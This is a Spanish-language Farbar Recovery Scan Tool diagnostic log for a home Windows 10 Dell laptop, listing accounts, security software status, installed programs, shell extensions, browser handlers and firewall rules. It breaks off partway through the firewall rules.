Resultados del Análisis Adicional de Farbar Recovery Scan Tool (x64) Versión: 19-05-2021 Ejecutado por Brandon (21-05-2021 16:48:21) Ejecutado desde C:\Users\Brandon\Desktop Windows 10 Home Single Language Versión 20H2 19042.804 (X64) (2021-01-27 17:02:02) Modo de Inicio: Normal ========================================================== ==================== Cuentas: ============================= Administrador (S-1-5-21-3337122944-776954238-4183529962-500 - Administrator - Disabled) Brandon (S-1-5-21-3337122944-776954238-4183529962-1001 - Administrator - Enabled) => C:\Users\Brandon DefaultAccount (S-1-5-21-3337122944-776954238-4183529962-503 - Limited - Disabled) Invitado (S-1-5-21-3337122944-776954238-4183529962-501 - Limited - Disabled) WDAGUtilityAccount (S-1-5-21-3337122944-776954238-4183529962-504 - Limited - Disabled) ==================== Centro de Seguridad ======================== (Si una entrada es incluida en el fixlist, será eliminada.) AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} AS: McAfee VirusScan (Enabled - Up to date) {2624E002-54CC-27F9-FD39-B2DD14D41191} AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} ==================== Programas instalados ====================== (Solo los programas de adware con indicador "Oculto", pueden ser añadidos al fixlist para hacerlos visibles. Los programas adware deben ser desinstalados manualmente.) 7-Zip 21.01 alpha (x64) (HKLM\...\7-Zip) (Version: 21.01 alpha - Igor Pavlov) Compresor WinRAR (HKLM-x32\...\WinRAR archiver) (Version: - ) Dell Digital Delivery Service (HKLM-x32\...\{DD47FCB3-5038-40CE-A02A-85F51BA03F37}) (Version: 3.6.1012.0 - Dell Products, LP) Dell Mobile Connect Drivers (HKLM\...\{04DF02C6-E3D7-4D26-A44C-6F8A2E218D2C}) (Version: 1.3.6844 - Screenovate Technologies Ltd.) Dell SupportAssist (HKLM\...\{5106801D-CA18-4173-85B9-D74C33358F7F}) (Version: 3.9.0.234 - Dell Inc.) Dell SupportAssist OS Recovery Plugin for Dell Update (HKLM\...\{900D0BCD-0B86-4DAA-B639-89BE70449569}) (Version: 5.4.1.14954 - Dell Inc.) Hidden Dell SupportAssist OS Recovery Plugin for Dell Update (HKLM-x32\...\{ec40a028-983b-4213-af2c-77ed6f6fe1d5}) (Version: 5.4.1.14954 - Dell Inc.) Dell SupportAssist Remediation (HKLM\...\{E9E87628-7D88-4557-9A80-49B2B4A81460}) (Version: 5.4.1.14954 - Dell Inc.) Hidden Dell SupportAssist Remediation (HKLM-x32\...\{ef6a1215-d616-4e4f-9453-525ed9903031}) (Version: 5.4.1.14954 - Dell Inc.) Dell Touchpad (HKLM\...\SynTPDeinstKey) (Version: 19.2.17.70 - Synaptics Incorporated) Dell Update for Windows 10 (HKLM\...\{41D2D254-D869-4CD8-B440-5DF49083C4BA}) (Version: 4.0.0 - Dell, Inc.) English-Spanish Interpreter Professional 4.4 (HKLM-x32\...\{C67B35F9-3E57-4724-B78F-661303FEEE3C}) (Version: 4.4 - Word Magic Software Inc.) Epic Games Launcher (HKLM-x32\...\{5EDB15EA-8B3E-4C51-AE28-7BFFE25208C2}) (Version: 1.1.298.0 - Epic Games, Inc.) Epic Games Launcher Prerequisites (x64) (HKLM\...\{F9C5C994-F6B9-4D75-B3E7-AD01B84073E9}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden Genshin Impact (HKLM\...\Genshin Impact) (Version: 2.8.4.0 - miHoYo Co.,Ltd) Google Chrome (HKU\S-1-5-21-3337122944-776954238-4183529962-1001\...\Google Chrome) (Version: 90.0.4430.212 - Google LLC) Intel(R) Dynamic Platform and Thermal Framework (HKLM-x32\...\{654EE65D-FAA4-4EA6-8C07-DC94E6A304D4}) (Version: 8.3.10207.5567 - Intel Corporation) Intel(R) Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 11.7.0.1054 - Intel Corporation) Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 23.20.16.4973 - Intel Corporation) Intel(R) Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 15.2.0.1020 - Intel Corporation) Intel(R) Trusted Connect Service Client x86 (HKLM-x32\...\{C9552825-7BF2-4344-BA91-D3CD46F4C441}) (Version: 1.47.866.0 - Intel Corporation) Hidden Intel(R) Trusted Connect Services Client (HKLM-x32\...\{246c6cc0-9810-4728-9a29-28474de2eec5}) (Version: 1.47.866.0 - Intel Corporation) Hidden Intel® Software Guard Extensions Platform Software (HKLM\...\{06F94C28-DE1D-485F-AD91-333ACEB3F52D}) (Version: 1.6.100.32677 - Intel Corporation) Launcher Prerequisites (x64) (HKLM-x32\...\{43a03b9c-4770-409c-a999-587b60700b63}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden Malwarebytes version 4.3.3.116 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 4.3.3.116 - Malwarebytes) Maxx Audio Installer (x64) (HKLM\...\{307032B2-6AF2-46D7-B933-62438DEB2B9A}) (Version: 2.7.9669.4 - Waves Audio Ltd.) Hidden Microsoft Edge (HKLM-x32\...\Microsoft Edge) (Version: 90.0.818.56 - Microsoft Corporation) Microsoft Office Profesional Plus 2019 - es-es (HKLM\...\ProPlus2019Retail - es-es) (Version: 16.0.14117.20000 - Microsoft Corporation) Microsoft OneDrive (HKU\S-1-5-21-3337122944-776954238-4183529962-1001\...\OneDriveSetup.exe) (Version: 21.093.0509.0001 - Microsoft Corporation) Microsoft Project - es-es (HKLM\...\ProjectPro2019Retail - es-es) (Version: 16.0.14117.20000 - Microsoft Corporation) Microsoft Update Health Tools (HKLM\...\{99FAF70F-9B61-4AB0-9EC0-B31F98FFDC4A}) (Version: 2.75.0.0 - Microsoft Corporation) Microsoft Visio - es-es (HKLM\...\VisioPro2019Retail - es-es) (Version: 16.0.14117.20000 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{1b103cea-f037-4504-81de-956057b442c3}) (Version: 12.0.30501.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation) Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 (HKLM-x32\...\{d992c12e-cab2-426f-bde3-fb8c53950b0d}) (Version: 14.0.24215.1 - Microsoft Corporation) Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24212 (HKLM-x32\...\{462f63a8-6347-4894-a1b3-dbfe3a4c981d}) (Version: 14.0.24212.0 - Microsoft Corporation) Office 16 Click-to-Run Extensibility Component (HKLM\...\{90160000-008C-0000-1000-0000000FF1CE}) (Version: 16.0.14117.20000 - Microsoft Corporation) Hidden Office 16 Click-to-Run Licensing Component (HKLM\...\{90160000-007E-0000-1000-0000000FF1CE}) (Version: 16.0.14117.20000 - Microsoft Corporation) Hidden Office 16 Click-to-Run Localization Component (HKLM\...\{90160000-008C-0C0A-1000-0000000FF1CE}) (Version: 16.0.14117.20000 - Microsoft Corporation) Hidden Origin (HKLM-x32\...\Origin) (Version: 10.5.90.45798 - Electronic Arts, Inc.) Qualcomm 11ac Wireless LAN&Bluetooth Installer (HKLM-x32\...\{E7086B15-806E-4519-A876-DBA9FDDE9A13}) (Version: 11.0.0.10480 - Qualcomm) QuickSet64 (HKLM\...\{87CF757E-C1F1-4D22-865C-00C6950B5258}) (Version: 11.1.40 - Dell Inc.) Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 10.0.14393.31228 - Realtek Semiconductor Corp.) Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.8622 - Realtek Semiconductor Corp.) RGSS-RTP Standard (HKLM-x32\...\RGSS-RTP Standard_is1) (Version: 1.04 - Enterbrain) Roblox Player for Brandon (HKU\S-1-5-21-3337122944-776954238-4183529962-1001\...\roblox-player) (Version: - Roblox Corporation) SmartByte Drivers and Services (HKLM\...\{9668B1BB-D0FE-4C0C-800C-B1555E069A62}) (Version: 3.1.940 - Rivet Networks) Software para dispositivos de chipset Intel® (HKLM-x32\...\{bb0592a7-5772-4736-9d55-2402740085db}) (Version: 10.1.1.38 - Intel(R) Corporation) Hidden STAR WARS™ Battlefront™ II (HKLM-x32\...\{8a882ce0-0c0b-4eb2-850c-28ebadab4f50}) (Version: 1.1.8.16162 - Electronic Arts) TeamViewer (HKLM-x32\...\TeamViewer) (Version: 15.15.5 - TeamViewer) Update for Windows 10 for x64-based Systems (KB4023057) (HKLM\...\{0BAA0A93-3AD3-4B19-9105-4C8C3FA92A83}) (Version: 2.67.0.0 - Microsoft Corporation) Hidden Update for Windows 10 for x64-based Systems (KB4480730) (HKLM\...\{0746492E-47B6-4251-940C-44462DFD74BB}) (Version: 2.55.0.0 - Microsoft Corporation) Vulkan Run Time Libraries 1.0.65.1 (HKLM\...\VulkanRT1.0.65.1) (Version: 1.0.65.1 - LunarG, Inc.) Hidden Vulkan Run Time Libraries 1.0.65.1 (HKLM\...\VulkanRT1.0.65.1-2) (Version: 1.0.65.1 - LunarG, Inc.) Hidden Vulkan Run Time Libraries 1.0.65.1 (HKLM\...\VulkanRT1.0.65.1-3) (Version: 1.0.65.1 - LunarG, Inc.) Hidden WebAdvisor de McAfee (HKLM-x32\...\{35ED3F83-4BDC-4c44-8EC6-6A8301C7413A}) (Version: 4.1.1.183 - McAfee, LLC) Packages: ========= Dell CinemaColor -> C:\Program Files\WindowsApps\PortraitDisplays.DellCinemaColor_2.2.22.0_x64__2dgmkzkw4h30c [2021-01-27] (Portrait Displays) Dell Customer Connect -> C:\Program Files\WindowsApps\DellInc.DellCustomerConnect_5.2.45.0_x64__htrsf667h5kn2 [2020-12-18] (Dell Inc) Dell Digital Delivery -> C:\Program Files\WindowsApps\DellInc.DellDigitalDelivery_4.0.70.0_x64__htrsf667h5kn2 [2021-01-22] (Dell Inc) Dell Mobile Connect -> C:\Program Files\WindowsApps\ScreenovateTechnologies.DellMobileConnect_3.2.9771.0_x64__0vhbc3ng4wbp0 [2021-01-25] (Screenovate Technologies) [Startup Task] Dell SupportAssist for Home PCs -> C:\Program Files\WindowsApps\DellInc.DellSupportAssistforPCs_3.9.11.0_x64__htrsf667h5kn2 [2021-05-20] (Dell Inc) Dell Update -> C:\Program Files\WindowsApps\DellInc.DellUpdate_4.0.33.0_x86__htrsf667h5kn2 [2020-12-19] (Dell Inc) Dropbox - promoción -> C:\Program Files\WindowsApps\C27EB4BA.DropboxOEM_20.4.3.0_x64__xbfy0k16fey96 [2020-12-18] (Dropbox Inc.) Extensión de vídeo MPEG-2 -> C:\Program Files\WindowsApps\Microsoft.MPEG2VideoExtension_1.0.22661.0_x64__8wekyb3d8bbwe [2020-12-18] (Microsoft Corporation) LinkedIn -> C:\Program Files\WindowsApps\7EE7776C.LinkedInforWindows_2.1.7098.0_neutral__w1wdnht996qgy [2020-12-18] (LinkedIn) Media Suite Essentials for Dell -> C:\Program Files\WindowsApps\DB6EA5DB.MediaSuiteEssentialsforDell_2.6.4028.0_x86__mcezb6ze687jp [2020-12-18] (CYBERLINK CORPORATION.) Microsoft Solitaire Collection -> C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.9.1252.0_x64__8wekyb3d8bbwe [2021-02-04] (Microsoft Studios) [MS Ad] Microsoft To Do -> C:\Program Files\WindowsApps\Microsoft.Todos_2.38.4482.0_x64__8wekyb3d8bbwe [2021-02-21] (Microsoft Corporation) [Startup Task] My Dell -> C:\Program Files\WindowsApps\DellInc.MyDell_1.7.25.0_x64__htrsf667h5kn2 [2021-01-27] (Dell Inc) Netflix -> C:\Program Files\WindowsApps\4DF9E0F8.Netflix_6.97.752.0_x64__mcm4njqhnhss8 [2020-12-18] (Netflix, Inc.) Power Media Player for Dell -> C:\Program Files\WindowsApps\DB6EA5DB.PowerMediaPlayerforDell_14.1.9506.0_x86__mcezb6ze687jp [2020-12-18] (CYBERLINK CORPORATION.) Power2Go for Dell -> C:\Program Files\WindowsApps\DB6EA5DB.Power2GoforDell_11.0.3920.0_x86__mcezb6ze687jp [2020-12-18] (CYBERLINK CORPORATION.) [Startup Task] PowerDirector for Dell -> C:\Program Files\WindowsApps\DB6EA5DB.PowerDirectorforDell_15.0.4409.0_x64__mcezb6ze687jp [2020-12-18] (CYBERLINK CORPORATION.) SmartByte -> C:\Program Files\WindowsApps\RivetNetworks.SmartByte_3.1.958.0_x64__rh07ty8m5nkag [2021-01-15] (Rivet Networks LLC) Spotify Music -> C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.153.608.0_x86__zpdnekdrzrea0 [2021-02-21] (Spotify AB) [Startup Task] Traductor -> C:\Program Files\WindowsApps\Microsoft.BingTranslator_5.6.0.0_x64__8wekyb3d8bbwe [2020-12-18] (Microsoft Corporation) ==================== Personalizado CLSID (Lista blanca): ============== (Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.) CustomCLSID: HKU\S-1-5-21-3337122944-776954238-4183529962-1001_Classes\CLSID\{85D8EE2F-794F-41F0-BB03-49D56A23BEF4}\InprocServer32 -> C:\Users\Brandon\AppData\Local\Google\Update\1.3.36.82\psuser_64.dll (Google LLC -> Google LLC) CustomCLSID: HKU\S-1-5-21-3337122944-776954238-4183529962-1001_Classes\CLSID\{A2C6CB58-C076-425C-ACB7-6D19D64428CD}\localserver32 -> C:\Users\Brandon\AppData\Local\Google\Chrome\Application\90.0.4430.212\notification_helper.exe (Google LLC -> Google LLC) CustomCLSID: HKU\S-1-5-21-3337122944-776954238-4183529962-1001_Classes\CLSID\{a9872fee-5a55-4ecb-9b0f-b06fedcf14d1}\localserver32 -> C:\Program Files\Waves\MaxxAudio\MaxxAudioPro.exe (Waves Inc -> Waves Audio Ltd) CustomCLSID: HKU\S-1-5-21-3337122944-776954238-4183529962-1001_Classes\CLSID\{CA8FA699-91CD-412F-9D13-9B1222F4370E}\InprocServer32 -> C:\Users\Brandon\AppData\Local\Google\Update\1.3.36.82\psuser_64.dll (Google LLC -> Google LLC) CustomCLSID: HKU\S-1-5-21-3337122944-776954238-4183529962-1001_Classes\CLSID\{CA919489-0396-4164-A6E7-94CDED45A707}\InprocServer32 -> C:\Users\Brandon\AppData\Local\Google\Update\1.3.36.52\psuser_64.dll => Ningún archivo CustomCLSID: HKU\S-1-5-21-3337122944-776954238-4183529962-1001_Classes\CLSID\{DEDF773D-E27B-485E-8E7D-85C5B0EB5A67}\InprocServer32 -> C:\Users\Brandon\AppData\Local\Google\Update\1.3.36.72\psuser_64.dll => Ningún archivo CustomCLSID: HKU\S-1-5-21-3337122944-776954238-4183529962-1001_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\Brandon\AppData\Local\Google\Update\1.3.36.82\psuser_64.dll (Google LLC -> Google LLC) ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2021-03-09] (Igor Pavlov) [Archivo no firmado] ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext64.dll [2006-12-11] () [Archivo no firmado] ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext.dll [2007-05-22] () [Archivo no firmado] ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2021-05-21] (Malwarebytes Corporation -> Malwarebytes) ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2021-03-09] (Igor Pavlov) [Archivo no firmado] ContextMenuHandlers4: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext64.dll [2006-12-11] () [Archivo no firmado] ContextMenuHandlers4-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext.dll [2007-05-22] () [Archivo no firmado] ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> Ningún archivo ContextMenuHandlers5: [igfxDTCM] -> {9B5F5829-A529-4B12-814A-E81BCB8D93FC} => C:\WINDOWS\System32\DriverStore\FileRepository\k127153.inf_amd64_3f3936d8dec668b8\igfxDTCM.dll [2018-03-21] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation) ContextMenuHandlers6: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2021-03-09] (Igor Pavlov) [Archivo no firmado] ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2021-05-21] (Malwarebytes Corporation -> Malwarebytes) ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext64.dll [2006-12-11] () [Archivo no firmado] ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext.dll [2007-05-22] () [Archivo no firmado] ==================== Codecs (Lista blanca) ==================== ==================== Accesos directos & WMI ======================== (Las entradas pueden ser listadas para ser restauradas o eliminadas.) Shortcut: C:\Users\Brandon\Favorites\Word Magic Software\Our Products.lnk -> hxxp://www.wordmagicsoft.com/product Shortcut: C:\Users\Brandon\Favorites\Word Magic Software\Special Offers.lnk -> hxxp://www.wordmagicsoft.com/buyno Shortcut: C:\Users\Brandon\Favorites\Word Magic Software\Visit us.lnk -> hxxp://www.wordmagicsoft.com ShortcutWithArgument: C:\Users\Brandon\Desktop\Papa - Chrome.lnk -> C:\Users\Brandon\AppData\Local\Google\Chrome\Application\chrome.exe (Google LLC) -> --profile-directory="Default" ShortcutWithArgument: C:\Users\Brandon\Desktop\YouTube.lnk -> C:\Users\Brandon\AppData\Local\Google\Chrome\Application\chrome_proxy.exe (Google LLC) -> --profile-directory=Default --app-id=agimnkijcaahngcdmfeangaknmldooml ShortcutWithArgument: C:\Users\Brandon\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Aplicaciones de Chrome\YouTube.lnk -> C:\Users\Brandon\AppData\Local\Google\Chrome\Application\chrome_proxy.exe (Google LLC) -> --profile-directory=Default --app-id=agimnkijcaahngcdmfeangaknmldooml ==================== Módulos cargados (Lista blanca) ============= 2021-02-17 22:31 - 2006-12-11 02:14 - 000043008 _____ () [Archivo no firmado] C:\Program Files (x86)\WinRAR\rarext64.dll 2021-04-17 19:31 - 2021-03-09 06:00 - 000077312 _____ (Igor Pavlov) [Archivo no firmado] C:\Program Files\7-Zip\7-zip.dll 2020-12-01 00:14 - 2020-12-01 00:14 - 001638912 _____ (Robert Simpson, et al.) [Archivo no firmado] C:\Program Files\Dell\SupportAssistAgent\bin\x64\SQLite.Interop.dll ==================== Alternate Data Streams (Lista blanca) ======== ==================== Modo Seguro (Lista blanca) ================== (Si una entrada es incluida en el fixlist, será eliminada del registro. El "AlternateShell" será restaurado.) HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service" ==================== Asociación (Lista blanca) ================= ==================== Internet Explorer (Lista blanca) ========== HKU\S-1-5-21-3337122944-776954238-4183529962-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://dell17win10.msn.com/?pc=DCTE HKU\S-1-5-21-3337122944-776954238-4183529962-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://dell17win10.msn.com/?pc=DCTE BHO: McAfee WebAdvisor -> {B164E929-A1B6-4A06-B104-2CD0E90A88FF} -> C:\Program Files\McAfee\WebAdvisor\x64\IEPlugin.dll [2021-01-21] (McAfee, LLC -> McAfee, LLC) BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\OCHelper.dll [2021-05-11] (Microsoft Corporation -> Microsoft Corporation) BHO-x32: McAfee WebAdvisor -> {B164E929-A1B6-4A06-B104-2CD0E90A88FF} -> C:\Program Files\McAfee\WebAdvisor\win32\IEPlugin.dll [2021-01-21] (McAfee, LLC -> McAfee, LLC) Handler: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2021-05-20] (Microsoft Corporation -> Microsoft Corporation) Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2021-05-20] (Microsoft Corporation -> Microsoft Corporation) Handler: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2021-05-20] (Microsoft Corporation -> Microsoft Corporation) Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2021-05-20] (Microsoft Corporation -> Microsoft Corporation) Handler: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2021-05-20] (Microsoft Corporation -> Microsoft Corporation) Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2021-05-20] (Microsoft Corporation -> Microsoft Corporation) Handler: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2021-05-20] (Microsoft Corporation -> Microsoft Corporation) Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2021-05-20] (Microsoft Corporation -> Microsoft Corporation) (Si una entrada es incluida en el fixlist, será eliminada del registro.) IE trusted site: HKU\S-1-5-21-3337122944-776954238-4183529962-1001\...\sharepoint.com -> hxxps://adminmepcr-files.sharepoint.com ==================== Hosts contenido: ========================= (Si es necesario, la directiva Hosts: puede ser incluida en el fixlist para restablecer Hosts.) 2018-04-11 17:38 - 2018-04-11 17:36 - 000000824 _____ C:\WINDOWS\system32\drivers\etc\hosts ==================== Otras Áreas =========================== (Actualmente no existe una corrección automática para esta sección.) HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\iCLS\;C:\Program Files\Intel\Intel(R) Management Engine Components\iCLS\;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;%SYSTEMROOT%\System32\OpenSSH\;C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL;C:\Program Files\Intel\Intel(R) Management Engine Components\DAL;C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT;C:\Program Files\Intel\Intel(R) Management Engine Components\IPT HKU\S-1-5-21-3337122944-776954238-4183529962-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Brandon\Downloads\thumb-1920-1109227.jpg DNS Servers: 190.113.97.11 - 190.113.97.3 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1) HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: Warn) Firewall de Windows está habilitado. ==================== MSCONFIG/TASK MANAGER elementos deshabilitados == ==================== Reglas de firewall (Lista blanca) ================ (Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.) FirewallRules: [{AF70B64E-178B-4718-ADA7-298DA2024012}] => (Allow) C:\Program Files\WindowsApps\ScreenovateTechnologies.DellMobileConnect_3.2.9771.0_x64__0vhbc3ng4wbp0\app\DellMobileConnectClient.exe (SCREENOVATE TECHNOLOGIES LTD. -> Screenovate Technologies Ltd.) FirewallRules: [{4E082E3B-5011-43C0-B7D8-D94C04874392}] => (Allow) C:\Program Files\WindowsApps\ScreenovateTechnologies.DellMobileConnect_3.2.9771.0_x64__0vhbc3ng4wbp0\app\DellMobileConnectClient.exe (SCREENOVATE TECHNOLOGIES LTD. -> Screenovate Technologies Ltd.) FirewallRules: [{5AC59379-7626-41C0-8DCC-D2F88877266D}] => (Allow) C:\Program Files\BlueStacks\HD-Player.exe => Ningún archivo FirewallRules: [{F7837948-0B91-4ECD-89C7-7D14F794AA5A}] => (Allow) C:\Program Files (x86)\Origin Games\STAR WARS Battlefront II\starwarsbattlefrontii.exe (Electronic Arts, Inc. -> Electronic Arts Inc.) FirewallRules: [{358BC508-7FE4-4B40-926F-292F46292E44}] => (Allow) C:\Program Files (x86)\Origin Games\STAR WARS Battlefront II\starwarsbattlefrontii.exe (Electronic Arts, Inc. -> Electronic Arts Inc.) FirewallRules: [{4F78C895-A07A-49FF-A3A7-C55A72069E42}] => (Allow) C:\Program Files (x86)\Origin Games\STAR WARS Battlefront II\starwarsbattlefrontii_trial.exe (Electronic Arts, Inc. -> Electronic Arts Inc.) FirewallRules: [{E38C2608-245C-48AF-9B2A-846E6F876E65}] => (Allow) C:\Program Files (x86)\Origin Games\STAR WARS Battlefront II\starwarsbattlefrontii_trial.exe (Electronic Arts, Inc. -> Electronic Arts Inc.) FirewallRules: [UDP Query User{13A74D8B-0FDB-417B-B958-5F295B735579}C:\users\brandon\appdata\local\google\chrome\application\chrome.exe] => (Block) C:\users\brandon\appdata\local\google\chrome\application\chrome.exe (Google LLC -> Google LLC) FirewallRules: [TCP Query User{34AFFDCC-E29F-43BA-BE8F-C41FD79B3C3C}C:\users\brandon\appdata\local\google\chrome\application\chrome.exe] => (Block) C:\users\brandon\appdata\local\google\chrome\application\chrome.exe (Google LLC -> Google LLC) FirewallRules: [{97BDE33E-E0DB-4717-9390-D9E51391E464}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe => Ningún archivo FirewallRules: [{99C711E6-B8A3-4224-AFF7-705343AE0196}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe => Ningún archivo FirewallRules: [{9A0D1FA6-D092-4A2B-8C65-E175AE46C421}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe => Ningún archivo FirewallRules: [{E74BFFB9-C7ED-4776-A9E6-8D0200BB7921}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe => Ningún archivo FirewallRules: [{B63A14F7-C7E6-4D48-9F24-AEFEEB02B7B1}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.68.96.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.) FirewallRules: [{8B95F506-03E9-4411-BD74-4B71EBFD3D45}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.68.96.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.) FirewallRules: [{7D72C3E3-A63F-46B7-A6E5-0F498FB6723E}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.68.96.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.) FirewallRules: [{317F5CBB-7F46-4C57-9A7D-5E78C46FFDEB}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.68.96.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.) FirewallRules: [TCP Query User{6FE8BCAB-FCD0-4FF5-8CEF-954F7B6D92D7}C:\users\brandon\appdata\local\microsoft\teams\current\teams.exe] => (Allow) C:\users\brandon\appdata\local\microsoft\teams\current\teams.exe => Ningún archivo FirewallRules: [UDP Query User{2C87C51F-339A-4CD1-BC9C-C5BDAF81993A}C:\users\brandon\appdata\local\microsoft\teams\current\teams.exe] => (Allow) C:\users\brandon\appdata\local\microsoft\teams\current\teams.exe => Ningún archivo FirewallRules: [{6EE5F6F9-1DEB-49CD-AF1E-EC72A44BC67C}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe => Ningún archivo FirewallRules: [{195329E0-8083-471F-BF15-309FE6FE9A5F}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe => Ningún archivo FirewallRules: [{D0967C70-ADC5-4073-A229-43075B580706}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.153.608.0_x86__zpdnekdrzrea0\Spotify.exe (Spotify AB -> Spotify Ltd) FirewallRules: 